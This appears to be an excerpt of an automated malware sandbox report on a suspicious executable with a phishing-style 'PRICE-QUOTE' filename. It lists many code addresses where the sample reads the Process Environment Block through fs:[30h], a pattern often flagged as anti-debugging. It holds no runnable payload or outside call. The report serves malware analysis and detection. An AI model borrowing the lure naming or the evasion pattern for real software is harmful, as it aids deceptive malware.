Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]	10_2_01A6A470
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6A470 mov eax, dword ptr fs:[00000030h]	10_2_01A6A470
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E443 mov eax, dword ptr fs:[00000030h]	10_2_01A7E443
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFA456 mov eax, dword ptr fs:[00000030h]	10_2_01AFA456
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6245A mov eax, dword ptr fs:[00000030h]	10_2_01A6245A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3645D mov eax, dword ptr fs:[00000030h]	10_2_01A3645D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A407AF mov eax, dword ptr fs:[00000030h]	10_2_01A407AF
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF47A0 mov eax, dword ptr fs:[00000030h]	10_2_01AF47A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE678E mov eax, dword ptr fs:[00000030h]	10_2_01AE678E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A627ED mov eax, dword ptr fs:[00000030h]	10_2_01A627ED
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A627ED mov eax, dword ptr fs:[00000030h]	10_2_01A627ED
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A627ED mov eax, dword ptr fs:[00000030h]	10_2_01A627ED
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACE7E1 mov eax, dword ptr fs:[00000030h]	10_2_01ACE7E1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A447FB mov eax, dword ptr fs:[00000030h]	10_2_01A447FB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A447FB mov eax, dword ptr fs:[00000030h]	10_2_01A447FB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4C7C0 mov eax, dword ptr fs:[00000030h]	10_2_01A4C7C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC07C3 mov eax, dword ptr fs:[00000030h]	10_2_01AC07C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C720 mov eax, dword ptr fs:[00000030h]	10_2_01A7C720
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C720 mov eax, dword ptr fs:[00000030h]	10_2_01A7C720
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABC730 mov eax, dword ptr fs:[00000030h]	10_2_01ABC730
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7273C mov eax, dword ptr fs:[00000030h]	10_2_01A7273C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7273C mov ecx, dword ptr fs:[00000030h]	10_2_01A7273C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7273C mov eax, dword ptr fs:[00000030h]	10_2_01A7273C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C700 mov eax, dword ptr fs:[00000030h]	10_2_01A7C700
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40710 mov eax, dword ptr fs:[00000030h]	10_2_01A40710
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A70710 mov eax, dword ptr fs:[00000030h]	10_2_01A70710
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A48770 mov eax, dword ptr fs:[00000030h]	10_2_01A48770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770 mov eax, dword ptr fs:[00000030h]	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7674D mov esi, dword ptr fs:[00000030h]	10_2_01A7674D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7674D mov eax, dword ptr fs:[00000030h]	10_2_01A7674D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7674D mov eax, dword ptr fs:[00000030h]	10_2_01A7674D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACE75D mov eax, dword ptr fs:[00000030h]	10_2_01ACE75D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40750 mov eax, dword ptr fs:[00000030h]	10_2_01A40750
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82750 mov eax, dword ptr fs:[00000030h]	10_2_01A82750
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82750 mov eax, dword ptr fs:[00000030h]	10_2_01A82750
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC4755 mov eax, dword ptr fs:[00000030h]	10_2_01AC4755
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C6A6 mov eax, dword ptr fs:[00000030h]	10_2_01A7C6A6
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A766B0 mov eax, dword ptr fs:[00000030h]	10_2_01A766B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44690 mov eax, dword ptr fs:[00000030h]	10_2_01A44690
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44690 mov eax, dword ptr fs:[00000030h]	10_2_01A44690
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE6F2 mov eax, dword ptr fs:[00000030h]	10_2_01ABE6F2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE6F2 mov eax, dword ptr fs:[00000030h]	10_2_01ABE6F2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE6F2 mov eax, dword ptr fs:[00000030h]	10_2_01ABE6F2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE6F2 mov eax, dword ptr fs:[00000030h]	10_2_01ABE6F2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC06F1 mov eax, dword ptr fs:[00000030h]	10_2_01AC06F1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC06F1 mov eax, dword ptr fs:[00000030h]	10_2_01AC06F1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A6C7 mov ebx, dword ptr fs:[00000030h]	10_2_01A7A6C7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A6C7 mov eax, dword ptr fs:[00000030h]	10_2_01A7A6C7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5E627 mov eax, dword ptr fs:[00000030h]	10_2_01A5E627
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A76620 mov eax, dword ptr fs:[00000030h]	10_2_01A76620
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A78620 mov eax, dword ptr fs:[00000030h]	10_2_01A78620
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4262C mov eax, dword ptr fs:[00000030h]	10_2_01A4262C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE609 mov eax, dword ptr fs:[00000030h]	10_2_01ABE609
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5260B mov eax, dword ptr fs:[00000030h]	10_2_01A5260B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A82619 mov eax, dword ptr fs:[00000030h]	10_2_01A82619
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A660 mov eax, dword ptr fs:[00000030h]	10_2_01A7A660
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A660 mov eax, dword ptr fs:[00000030h]	10_2_01A7A660
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A72674 mov eax, dword ptr fs:[00000030h]	10_2_01A72674
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0866E mov eax, dword ptr fs:[00000030h]	10_2_01B0866E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0866E mov eax, dword ptr fs:[00000030h]	10_2_01B0866E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5C640 mov eax, dword ptr fs:[00000030h]	10_2_01A5C640
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0 mov eax, dword ptr fs:[00000030h]	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A409AD mov eax, dword ptr fs:[00000030h]	10_2_01A409AD
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A409AD mov eax, dword ptr fs:[00000030h]	10_2_01A409AD
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC89B3 mov esi, dword ptr fs:[00000030h]	10_2_01AC89B3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC89B3 mov eax, dword ptr fs:[00000030h]	10_2_01AC89B3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC89B3 mov eax, dword ptr fs:[00000030h]	10_2_01AC89B3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACE9E0 mov eax, dword ptr fs:[00000030h]	10_2_01ACE9E0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A729F9 mov eax, dword ptr fs:[00000030h]	10_2_01A729F9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A729F9 mov eax, dword ptr fs:[00000030h]	10_2_01A729F9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0A9D3 mov eax, dword ptr fs:[00000030h]	10_2_01B0A9D3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD69C0 mov eax, dword ptr fs:[00000030h]	10_2_01AD69C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A9D0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A9D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A9D0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A9D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A9D0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A9D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A9D0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A9D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A9D0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A9D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4A9D0 mov eax, dword ptr fs:[00000030h]	10_2_01A4A9D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A749D0 mov eax, dword ptr fs:[00000030h]	10_2_01A749D0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC892A mov eax, dword ptr fs:[00000030h]	10_2_01AC892A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD892B mov eax, dword ptr fs:[00000030h]	10_2_01AD892B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE908 mov eax, dword ptr fs:[00000030h]	10_2_01ABE908
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABE908 mov eax, dword ptr fs:[00000030h]	10_2_01ABE908
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A38918 mov eax, dword ptr fs:[00000030h]	10_2_01A38918
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A38918 mov eax, dword ptr fs:[00000030h]	10_2_01A38918
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACC912 mov eax, dword ptr fs:[00000030h]	10_2_01ACC912
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A66962 mov eax, dword ptr fs:[00000030h]	10_2_01A66962
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A66962 mov eax, dword ptr fs:[00000030h]	10_2_01A66962
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A66962 mov eax, dword ptr fs:[00000030h]	10_2_01A66962
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A8096E mov eax, dword ptr fs:[00000030h]	10_2_01A8096E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A8096E mov edx, dword ptr fs:[00000030h]	10_2_01A8096E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A8096E mov eax, dword ptr fs:[00000030h]	10_2_01A8096E
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACC97C mov eax, dword ptr fs:[00000030h]	10_2_01ACC97C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE4978 mov eax, dword ptr fs:[00000030h]	10_2_01AE4978
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE4978 mov eax, dword ptr fs:[00000030h]	10_2_01AE4978
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC0946 mov eax, dword ptr fs:[00000030h]	10_2_01AC0946
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B14940 mov eax, dword ptr fs:[00000030h]	10_2_01B14940
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40887 mov eax, dword ptr fs:[00000030h]	10_2_01A40887
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACC89D mov eax, dword ptr fs:[00000030h]	10_2_01ACC89D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0A8E4 mov eax, dword ptr fs:[00000030h]	10_2_01B0A8E4
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C8F9 mov eax, dword ptr fs:[00000030h]	10_2_01A7C8F9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7C8F9 mov eax, dword ptr fs:[00000030h]	10_2_01A7C8F9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6E8C0 mov eax, dword ptr fs:[00000030h]	10_2_01A6E8C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B108C0 mov eax, dword ptr fs:[00000030h]	10_2_01B108C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62835 mov eax, dword ptr fs:[00000030h]	10_2_01A62835
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62835 mov eax, dword ptr fs:[00000030h]	10_2_01A62835
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62835 mov eax, dword ptr fs:[00000030h]	10_2_01A62835
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62835 mov ecx, dword ptr fs:[00000030h]	10_2_01A62835
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62835 mov eax, dword ptr fs:[00000030h]	10_2_01A62835
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62835 mov eax, dword ptr fs:[00000030h]	10_2_01A62835
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE483A mov eax, dword ptr fs:[00000030h]	10_2_01AE483A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE483A mov eax, dword ptr fs:[00000030h]	10_2_01AE483A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7A830 mov eax, dword ptr fs:[00000030h]	10_2_01A7A830
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACC810 mov eax, dword ptr fs:[00000030h]	10_2_01ACC810
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD6870 mov eax, dword ptr fs:[00000030h]	10_2_01AD6870
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AD6870 mov eax, dword ptr fs:[00000030h]	10_2_01AD6870
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACE872 mov eax, dword ptr fs:[00000030h]	10_2_01ACE872
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACE872 mov eax, dword ptr fs:[00000030h]	10_2_01ACE872
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A52840 mov ecx, dword ptr fs:[00000030h]	10_2_01A52840
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A70854 mov eax, dword ptr fs:[00000030h]	10_2_01A70854
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44859 mov eax, dword ptr fs:[00000030h]	10_2_01A44859
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A44859 mov eax, dword ptr fs:[00000030h]	10_2_01A44859
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50BBE mov eax, dword ptr fs:[00000030h]	10_2_01A50BBE
